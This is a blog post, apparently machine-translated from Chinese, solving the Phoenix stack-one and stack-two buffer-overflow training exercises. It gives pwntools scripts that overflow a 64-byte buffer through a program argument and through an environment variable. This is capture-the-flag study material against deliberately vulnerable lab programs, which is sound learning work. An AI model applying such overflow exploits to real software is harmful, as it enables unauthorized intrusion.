BuringStraw

BuringStraw

HomeArchives

[pwn Notes 1] stack-one and stack-two (Phoenix)

#pwn#stack24
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The notes cover stack-one and stack-two challenges in Phoenix, with stack-one involving copying the first program argument using strcpy and stack-two involving writing to an environment variable. The main difference between the two challenges is the method of data input.

These two are very simple, with only a difference in the way data is read. Just like zero, there are requirements for the data being overwritten.

stack-one#

Copy the program's first argument using strcpy to a string.

https://s2.loli.net/2023/02/15/P3IYOneKUiS6vNV.png

After running in gdb, directly append the argument to bring it along.

pwntools' sh.run can accept a byte array as an argument, which can include startup parameters. (After checking the documentation, for the run method: Backward compatibility. Use system())

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p32(0x496c5962)

sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s)
print(sh.recvlines(2))

stack-two#

This time, write to an environment variable.

https://s2.loli.net/2023/02/15/NhRfz7Ciw8UavO4.png

At this point, it is found that writing "\0" into the environment variable will cause problems. We need to write 32-bit data, so p64 should not be used. If used, it will automatically pad with 0, resulting in an error.

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p32(0x0d0a090a)
print(s)
s = s.decode()
print(s)
sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s})
print(sh.recvlines(2))
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.